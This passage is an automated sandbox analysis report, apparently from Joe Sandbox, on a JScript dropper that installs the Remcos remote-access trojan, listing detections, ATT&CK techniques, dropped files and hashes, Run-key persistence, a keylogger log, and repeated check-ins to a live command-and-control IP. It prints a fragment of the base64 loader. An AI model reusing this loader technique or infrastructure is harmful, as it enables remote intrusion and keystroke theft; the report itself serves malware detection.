                      Source: Yara matchFile source: 00000008.00000002.2523747715.0000000032AE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2523856221.00000000344BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1376834668.0000000030700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1422766132.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 6980, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 5516, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7308, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7504, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: cmd.exe8_2_02E05091
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: cmd.exe16_2_03005091

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information13
                      Scripting                      		1
                      Valid Accounts                      		1
                      Native API                      		13
                      Scripting                      		1
                      DLL Side-Loading                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      OS Credential Dumping                      		2
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		11
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution                      		1
                      DLL Side-Loading                      		1
                      Bypass User Account Control                      		3
                      Obfuscated Files or Information                      		211
                      Input Capture                      		1
                      Account Discovery                      		Remote Desktop Protocol211
                      Input Capture                      		2
                      Encrypted Channel                      		Exfiltration Over Bluetooth1
                      Defacement
                      Email AddressesDNS ServerDomain Accounts1
                      Command and Scripting Interpreter                      		1
                      Valid Accounts                      		1
                      Valid Accounts                      		1
                      DLL Side-Loading                      		2
                      Credentials In Files                      		1
                      System Service Discovery                      		SMB/Windows Admin Shares3
                      Clipboard Data                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Service Execution                      		1
                      Windows Service                      		11
                      Access Token Manipulation                      		1
                      Bypass User Account Control                      		NTDS3
                      File and Directory Discovery                      		Distributed Component Object ModelInput Capture1
                      Data Encoding                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchd1
                      Registry Run Keys / Startup Folder                      		1
                      Windows Service                      		11
                      Masquerading                      		LSA Secrets25
                      System Information Discovery                      		SSHKeylogging1
                      Remote Access Software                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
                      Process Injection                      		1
                      Valid Accounts                      		Cached Domain Credentials231
                      Security Software Discovery                      		VNCGUI Input Capture1
                      Application Layer Protocol                      		Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                      Registry Run Keys / Startup Folder                      		2
                      Virtualization/Sandbox Evasion                      		DCSync2
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                      Access Token Manipulation                      		Proc Filesystem2
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                      Process Injection                      		/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                      System Owner/User Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1639312 Sample: 6732832.js Startdate: 15/03/2025 Architecture: WINDOWS Score: 100 55 Suricata IDS alerts for network traffic 2->55 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 10 other signatures 2->61 8 wscript.exe 1 2 2->8         started        12 Ekbmajrx.PIF 2->12         started        14 Ekbmajrx.PIF 2->14         started        process3 file4 39 C:\Users\user\AppData\Local\Temp\x.exe, PE32 8->39 dropped 63 Benign windows process drops PE files 8->63 65 JScript performs obfuscated calls to suspicious functions 8->65 67 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->67 16 x.exe 1 7 8->16         started        69 Antivirus detection for dropped file 12->69 71 Multi AV Scanner detection for dropped file 12->71 73 Early bird code injection technique detected 12->73 20 colorcpl.exe 12->20         started        75 Allocates memory in foreign processes 14->75 22 colorcpl.exe 14->22         started        signatures5 process6 file7 37 C:\Users\user\Linkskbmajrx.PIF, PE32 16->37 dropped 45 Antivirus detection for dropped file 16->45 47 Multi AV Scanner detection for dropped file 16->47 49 Early bird code injection technique detected 16->49 53 4 other signatures 16->53 24 colorcpl.exe 4 3 16->24         started        29 cmd.exe 1 16->29         started        31 cmd.exe 1 16->31         started        51 Detected Remcos RAT 20->51 signatures8 process9 dnsIp10 43 196.251.83.79, 49693, 49696, 49697 SONIC-WirelessZA Seychelles 24->43 41 C:\ProgramData\remcos\logs.dat, data 24->41 dropped 77 Contains functionality to bypass UAC (CMSTPLUA) 24->77 79 Detected Remcos RAT 24->79 81 Contains functionalty to change the wallpaper 24->81 83 4 other signatures 24->83 33 conhost.exe 29->33         started        35 conhost.exe 31->35         started        file11 signatures12 process13

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      6732832.js48%VirustotalBrowse
                      6732832.js42%ReversingLabsScript-JS.Trojan.ModiLoader
                      6732832.js100%AviraJS/TrojanDropper.MA

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\Links\Ekbmajrx.PIF100%AviraTR/AD.Remcos.lpmfw
                      C:\Users\user\AppData\Local\Temp\x.exe100%AviraTR/AD.Remcos.lpmfw
                      C:\Users\user\AppData\Local\Temp\x.exe75%ReversingLabsWin32.Backdoor.Remcos
                      C:\Users\user\AppData\Local\Temp\x.exe40%VirustotalBrowse
                      C:\Users\user\Links\Ekbmajrx.PIF75%ReversingLabsWin32.Backdoor.Remcos
                      C:\Users\user\Links\Ekbmajrx.PIF40%VirustotalBrowse

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      No Antivirus matches

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://geoplugin.net/json.gpcolorcpl.exefalse
                        		high
                        http://geoplugin.net/json.gp/Cx.exe, 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmpfalse
                          		high
                          http://www.pmail.comx.exe, 00000003.00000003.1234992961.000000007ED63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234992961.000000007EDE4000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1267818979.0000000020693000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234397390.000000007EDF4000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            196.251.83.79
                            		unknownSeychelles
                            		37417SONIC-WirelessZAtrue

                            General Information

                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1639312
                            Start date and time:2025-03-15 09:30:23 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 57s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:23
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • GSI enabled (Javascript)
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:6732832.js
                            Detection:MAL
                            Classification:mal100.rans.troj.spyw.expl.evad.winJS@19/7@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 71
                            • Number of non-executed functions: 235
                            Cookbook Comments:
                            • Found application associated with file extension: .js

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 23.199.214.10, 4.245.163.56
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            04:31:18API Interceptor2x Sleep call for process: x.exe modified
                            04:31:29API Interceptor2x Sleep call for process: Ekbmajrx.PIF modified
                            04:31:54API Interceptor2097339x Sleep call for process: colorcpl.exe modified
                            09:31:21AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ekbmajrx C:\\Users\\user\\Links\Ekbmajrx.url
                            09:31:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Ekbmajrx C:\\Users\\user\\Links\Ekbmajrx.url

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            SONIC-WirelessZAhgfs.mips.elfGet hashmaliciousUnknownBrowse
                            • 196.251.81.246
                            hgfs.arm5.elfGet hashmaliciousUnknownBrowse
                            • 196.251.81.246
                            hgfs.mpsl.elfGet hashmaliciousUnknownBrowse
                            • 196.251.81.246
                            hgfs.x86.elfGet hashmaliciousUnknownBrowse
                            • 196.251.81.246
                            hgfs.arm.elfGet hashmaliciousUnknownBrowse
                            • 196.251.81.246
                            payment confirmation.exeGet hashmaliciousAgentTeslaBrowse
                            • 196.251.83.222
                            purchase order T&B19-20PO128.exeGet hashmaliciousAgentTeslaBrowse
                            • 196.251.83.222
                            SecuriteInfo.com.Win32.CrypterX-gen.25378.7586.exeGet hashmaliciousAgentTeslaBrowse
                            • 196.251.83.222
                            demon.arm.elfGet hashmaliciousUnknownBrowse
                            • 196.251.81.246
                            demon.mpsl.elfGet hashmaliciousUnknownBrowse
                            • 196.251.81.246

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\ProgramData\16992.cmd

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                            File Type:Unicode text, UTF-8 text, with very long lines (577), with CRLF line terminators
                            Category:dropped
                            Size (bytes):2860
                            Entropy (8bit):4.335677764406247
                            Encrypted:false
                            SSDEEP:48:TpaPBLhRc/CQmhbR7T7RUHthMqH+2kWqedNhxeuMAvI7y2Ge4aTt:TpaPNSxYxTNcP+AXrvI+2a+t
                            MD5:9A020804EBA1FFAC2928D7C795144BBF
                            SHA1:61FDC4135AFDC99E106912AEAFEAC9C8A967BECC
                            SHA-256:A86C6C7A2BF9E12C45275A5E7EBEBD5E6D2BA302FE0A12600B7C9FDF283D9E63
                            SHA-512:42F6D754F1BDBEB6E4CC7AEB57FF4C4D126944F950D260A0839911E576AD16002C16122F81C1D39FA529432DCA0A48C9ACFBB18804CA9044425C8E424A5518BE
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:@%.....%e%........r%c%....r%h%rr%o%.o...% %... ..%o%..%f%r..r...%f%.. ......%.."%........%C% %:% .%\%.........%W% ...o.. .%i%...o...%n%o..r.....%d%.........%o%. ..%w%....r.%s%....% %...%\%.o....%S%... %y%.. ....%s%...%W% .%O%....%W%...%6%o.o.r%4%......%\%....%s%....%v%.........%c%......%h%..%o%.......%s%......%t%....o.....%.%.........%p%.......%i%.....%f%... .r...%"%..% % ...%>%.........%n%..........%u%.........o%l%.. .o...% %.r...r...% % ..%&%.......o%..p%........

                            C:\ProgramData\6770.cmd

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                            File Type:Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                            Category:dropped
                            Size (bytes):19854
                            Entropy (8bit):4.799579726516822
                            Encrypted:false
                            SSDEEP:384:cI9V3jUBZ6ocTNjb6yy2gbQ7AI8VbBR8blGXsfVsqvLWUzz2:cIzjMwF8yy2gbQ7KObcXvwLZ2
                            MD5:1DF650CCA01129127D30063634AB5C03
                            SHA1:BC7172DEC0B12B05F2247BD5E17751EB33474D4E
                            SHA-256:EDD4094E7A82A6FF8BE65D6B075E9513BD15A6B74F8032B5C10CE18F7191FA60
                            SHA-512:0BDDF9ECAAEDB0C30103A1FBFB644D6D4F7608BD596403307ED89B2390568C3A29E2CF55D10E2EADBFC407EDE52EAF9A4F2321BA5F37E358A1039F73C7688FBD
                            Malicious:false
                            Preview:@%........%e%..... ....%c%.. .. ..%h%.....%o% % %..o.... %o%.%f%..%f%...%..c%...r...%l%......%s%... .%..@%.....%e%..%c%.....%h%... .....%o% .. % %. ...%o%........%f%.%f%..........%..s%. . ... %e%...... ...%t%.. .. .% %.....%"%.....%s%. ..%Z%.....%k%...%r% .... ...%=%.........%s%. %e%.%t%....... ..% %. ...... %"%.......%..%sZkr%"%... .. ...%t%...%w%..%V%.... .%Y%.....%=% ...... .%=%. .....%"%.. . ....%..%sZkr%"%.......%t%.%A%.....%h%......%U%....%M%.... . %m%........%L% .....%r%.%f%..%R%... %%twVY%r%.%e%.. . . ..%m%..........% %. .%"%..%..%sZkr%"%. .....%K%. ..%j% %M% ......%q%.... .....%h%...%Y% ...%E%.. %O%.

                            C:\ProgramData\neo.cmd

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                            File Type:Unicode text, UTF-8 text, with very long lines (372), with CRLF line terminators
                            Category:dropped
                            Size (bytes):17570
                            Entropy (8bit):4.749675665870814
                            Encrypted:false
                            SSDEEP:384:7ChtOaPnz/rMnYsfg0fluW0mCRe9eRPCRpKJhF52Dn5Uo3:7atrYRg0tuWV8e0qRpym5U2
                            MD5:5BAF253744AD26F35BA17DB6B80763E9
                            SHA1:6235B00643E324AC5FEA07F9ADAE9F2A0DB56B99
                            SHA-256:9CBB41E6C4F8565A6D121B770FCF3F15A6891C8DF8BFBA6D0414B3AD3298BDBA
                            SHA-512:5C949A081D922963745A3F0DEEE87C9D862D278889A6C7790AABF34BC09E04DCE7B3AB41EF7A4F584571CCA739AF0A1DEA4FA244C378696AC7EA6D6AC9B415F8
                            Malicious:false
                            Preview:@%... ...%e%....%c%........ .%h%.%o% ...... .% %.....%o%...... ..%f%.... %f%....%..s%... .%e%... ..%t% ........% %.......%"% ..%o%....... .%R%.... ...%W%....%d%......%=%...%s%.. ... %e%........ %t%.... % %. . . .%"%.. .......%..%oRWd%"%..%E%......%V% ...... ..%O%...%s%.. %=% .... %=%..... .%"%...%..%oRWd%"%. . .....%H%....... ..%F% .......%u%...%B%. . ...%q%..%x%... .%m%... ... .%o%....%X%.. .%C%... .%%EVOs%C%....... .%l% .%o%........%a%...... .%"%.. . %..%oRWd%"%.... .....%C%...%l%. .... ..%K%.....%K%... ... %T%.....%x%... %k%.. ... %q%..... ....%R%.. ... %w%.%%EVOs%r%. ... ...%e%..... ..%m%...% %......%"% ...%..%oRWd%"%. %C%. . .%M%....%m%.

                            C:\ProgramData\remcos\logs.dat

                            Download File
                            Process:C:\Windows\SysWOW64\colorcpl.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):234
                            Entropy (8bit):3.355278208510733
                            Encrypted:false
                            SSDEEP:3:rgl/lQlFxnfscl5JWRal2Jl+7R0DAlBG4moojklovDl6ALilXIkqoojklovDl6v:Ml/lQloU5YcIeeDAlS1gWAAe5q1gWAv
                            MD5:53D663FC540711F41D43C2770881C29D
                            SHA1:151F43A18C1B9D0429FD5912B16E8CAEB5744B21
                            SHA-256:5FB2A523BA39E3DBEFCBC645C21A77EC1AC84DB059D68B70FC7547D17E3FBEFD
                            SHA-512:27ECBC390F6EBBD58F7F503B66418A8AC59048DA65D63F2F6947AF15E8125BCE7B468B9A825A4066C0C3462595A073E2A9DEA3CE0AD79D2ED100855904082D61
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                            Preview:....[.2.0.2.5./.0.3./.1.5. .0.4.:.3.1.:.2.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                            C:\Users\user\AppData\Local\Temp\x.exe

                            Download File
                            Process:C:\Windows\System32\wscript.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):1964032
                            Entropy (8bit):7.560180457448318
                            Encrypted:false
                            SSDEEP:24576:L3pqOxNFmvKAM+Dpg041zNic8UE+wpJauLmz0fAZ5OrBwIkXNSgIc1qGg9F:L3pTmkzN7nE+wpJ3Lmz0fYxzDg9F
                            MD5:56432B42A6DF492A60F9577716132B79
                            SHA1:6A733D64CB6184873C052EC1FEDB2B4F49D043A1
                            SHA-256:F75106426F6B4495215DB92302E1316BB24BEB1DFBBC97C3F5FE217E12C9A8A8
                            SHA-512:461EE555A47FDDBF9F55A6208F284C0DD0A88D8D481794E9DE53EFA04BAEB4B77C43F4D6887989889C0DE3F0328A32F84BA1CE5BF982D67954D9E49008B8540E
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 75%
                            • Antivirus: Virustotal, Detection: 40%, Browse
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................................... ....@..............................................@..............................n(...`...&.......................|..................................................`...H............................text...t........................... ..`.itext..T........................... ..`.data...."... ...$..................@....bss.....6...P.......(...................idata..n(.......*...(..............@....tls....4............R...................rdata...............R..............@..@.reloc...|.......~...T..............@..B.rsrc....&...`...&..................@..@....................................@..@................................................................................................

                            C:\Users\user\Links\Ekbmajrx.PIF

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):1964032
                            Entropy (8bit):7.560180457448318
                            Encrypted:false
                            SSDEEP:24576:L3pqOxNFmvKAM+Dpg041zNic8UE+wpJauLmz0fAZ5OrBwIkXNSgIc1qGg9F:L3pTmkzN7nE+wpJ3Lmz0fYxzDg9F
                            MD5:56432B42A6DF492A60F9577716132B79
                            SHA1:6A733D64CB6184873C052EC1FEDB2B4F49D043A1
                            SHA-256:F75106426F6B4495215DB92302E1316BB24BEB1DFBBC97C3F5FE217E12C9A8A8
                            SHA-512:461EE555A47FDDBF9F55A6208F284C0DD0A88D8D481794E9DE53EFA04BAEB4B77C43F4D6887989889C0DE3F0328A32F84BA1CE5BF982D67954D9E49008B8540E
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 75%
                            • Antivirus: Virustotal, Detection: 40%, Browse
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................................... ....@..............................................@..............................n(...`...&.......................|..................................................`...H............................text...t........................... ..`.itext..T........................... ..`.data...."... ...$..................@....bss.....6...P.......(...................idata..n(.......*...(..............@....tls....4............R...................rdata...............R..............@..@.reloc...|.......~...T..............@..B.rsrc....&...`...&..................@..@....................................@..@................................................................................................

                            C:\Users\user\Links\Ekbmajrx.url

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                            File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\user\\Links\\Ekbmajrx.PIF">), ASCII text, with CRLF line terminators
                            Category:modified
                            Size (bytes):102
                            Entropy (8bit):5.138899455452757
                            Encrypted:false
                            SSDEEP:3:HRAbABGQYmTWAX+eLCMCIEPLCHysbxusvcP5ov:HRYFVmTWDeLPwzCSExuOcP2v
                            MD5:4F81E9AAC293C160319B7F34FD9626E8
                            SHA1:907CE417004F900CA1D366434F03197CFDCE4824
                            SHA-256:178A1B09D1D71B147DD043BC97D736DCD050FB05FBF4FA437F7D661057DA5660
                            SHA-512:CB98A49238145BF3CE850CC264AF1CC5BF558A5C6A9D2F11D6F1A5E1CE9F4C7F412951E1CEDA80072D6070E9319F657E808817AE7FEC754600595DBDE20017F5
                            Malicious:false
                            Preview:[InternetShortcut]..URL=file:"C:\\Users\\user\\Links\\Ekbmajrx.PIF"..IconIndex=978402..HotKey=80..

                            Static File Info

                            General

                            File type:ASCII text, with very long lines (65438), with CRLF line terminators
                            Entropy (8bit):5.835753755969207
                            TrID:
                              File name:6732832.js
                              File size:2'619'064 bytes
                              MD5:f497655b5c7c0834be1fe0ea0eb7493c
                              SHA1:b8e7608a478d0b50547e758f4a6567823fa3f311
                              SHA256:53bcd29a7e6afd5ff7e507a36fc47c7696106c54259bd8c10c76ac6716fda0ae
                              SHA512:0694780d6c2becce356e1aa221e06a7dc6d675d8328a6e7b641c1ce2c967a3b6655bddf6d3296a24e68f3f05ab9a8641158f7318bdd9e174f2fba3ea485aac14
                              SSDEEP:49152:PEo4ogzB/y7CkkPYFnozJ95atNzakAQ8b/s1R0d:0
                              TLSH:1DC5E13C4706AD6627BC16F4C81C29805EBC15779784ABE8AE7E40FF267D702876D4AC
                              File Content Preview:var D=new ActiveXObject("Microsoft.XMLDOM")..var E=D.createElement("t")..E.dataType="bin.base64"..E.text="TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV

                              File Icon

                              Icon Hash:68d69b8bb6aa9a86

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2025-03-15T09:31:22.521437+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649693196.251.83.79786TCP
                              2025-03-15T09:31:25.137339+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649696196.251.83.79786TCP
                              2025-03-15T09:31:27.761668+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649697196.251.83.79786TCP
                              2025-03-15T09:31:30.406679+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649698196.251.83.79786TCP
                              2025-03-15T09:31:33.063665+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649699196.251.83.79786TCP
                              2025-03-15T09:31:35.703350+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649702196.251.83.79786TCP
                              2025-03-15T09:31:38.345431+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649703196.251.83.79786TCP
                              2025-03-15T09:31:40.984604+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649704196.251.83.79786TCP
                              2025-03-15T09:31:43.613149+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649705196.251.83.79786TCP
                              2025-03-15T09:31:46.269344+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649706196.251.83.79786TCP
                              2025-03-15T09:31:48.910089+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649707196.251.83.79786TCP
                              2025-03-15T09:31:51.534932+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649708196.251.83.79786TCP
                              2025-03-15T09:31:54.176298+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649709196.251.83.79786TCP
                              2025-03-15T09:31:56.800273+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649710196.251.83.79786TCP
                              2025-03-15T09:31:59.457500+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649711196.251.83.79786TCP
                              2025-03-15T09:32:02.097409+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649712196.251.83.79786TCP
                              2025-03-15T09:32:04.738636+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649713196.251.83.79786TCP
                              2025-03-15T09:32:07.394972+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649714196.251.83.79786TCP
                              2025-03-15T09:32:10.020325+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649716196.251.83.79786TCP
                              2025-03-15T09:32:12.675501+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649718196.251.83.79786TCP
                              2025-03-15T09:32:15.332382+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649719196.251.83.79786TCP
                              2025-03-15T09:32:17.957780+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649720196.251.83.79786TCP
                              2025-03-15T09:32:20.597598+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649721196.251.83.79786TCP
                              2025-03-15T09:32:23.222698+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649722196.251.83.79786TCP
                              2025-03-15T09:32:25.847823+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649723196.251.83.79786TCP
                              2025-03-15T09:32:28.506777+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649724196.251.83.79786TCP
                              2025-03-15T09:32:31.144340+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649725196.251.83.79786TCP
                              2025-03-15T09:32:33.772652+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649726196.251.83.79786TCP
                              2025-03-15T09:32:36.409860+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649728196.251.83.79786TCP
                              2025-03-15T09:32:39.035951+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649729196.251.83.79786TCP
                              2025-03-15T09:32:41.910893+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649730196.251.83.79786TCP
                              2025-03-15T09:32:44.571145+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649731196.251.83.79786TCP
                              2025-03-15T09:32:47.223569+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649732196.251.83.79786TCP
                              2025-03-15T09:32:49.816417+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649733196.251.83.79786TCP
